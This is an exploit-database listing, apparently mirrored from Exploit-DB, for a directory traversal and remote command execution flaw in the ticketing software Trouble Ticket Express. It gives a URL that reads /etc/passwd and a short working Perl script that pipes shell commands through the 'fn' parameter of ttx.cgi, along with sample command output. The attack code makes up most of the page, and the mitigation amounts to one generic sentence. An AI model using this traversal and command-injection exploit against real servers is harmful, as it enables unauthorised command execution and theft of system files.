Trouble Ticket Express Remote Code Execution/Directory Traversal

vendor:

Trouble Ticket Express

by:

zombiefx

8,8

CVSS

HIGH

Remote Code Execution/Directory Traversal

CWE

Product Name: Trouble Ticket Express

Affected Version From: v3.01

Affected Version To: v2.21

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

N/A

Trouble Ticket Express Remote Code Execution/Directory Traversal

This is only possible if an attachment input is available. Directory Traversal Vuln is http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd Simple perl code to run commands on the box $ id uid=0(httpd) gid=0(httpd) groups=0(httpd) $ whoami httpd!/usr/bin/perl use warnings; use strict; use LWP::Simple; my $url = 'http://localhost/cgi-bin/ttx.cgi'; print '$ '; while (<>) { print get( $url . '?cmd=file&fn=|' . $_ . '|' ); print '$ '; }

Mitigation:

Ensure that all user input is properly sanitized and validated before being used in any system operations.

Source

Exploit-DB raw data:

# Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal
# Author: zombiefx <darkernet@gmail.com<mailto:darkernet@gmail.com>>
# Software Link: http://www.troubleticketexpress.com/download/ttx301.zip
# Version: v3.01,v3.0,v2.24,v2.21
# Tested on: Linux
# CVE :
# Code:

# This is only possible if an attachment input is available.
# Directory Traversal Vuln is
# http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd
# Simple perl code to run commands on the box
# $ id
# uid=0(httpd) gid=0(httpd) groups=0(httpd)
# $ whoami
# httpd

#!/usr/bin/perl
use warnings;
use strict;
use LWP::Simple;
my $url = 'http://localhost/cgi-bin/ttx.cgi';
print '$ ';
while (<>) {
    print get( $url . '?cmd=file&fn=|' . $_ . '|' );
    print '$ ';
}
<mailto:darkernet@gmail.com>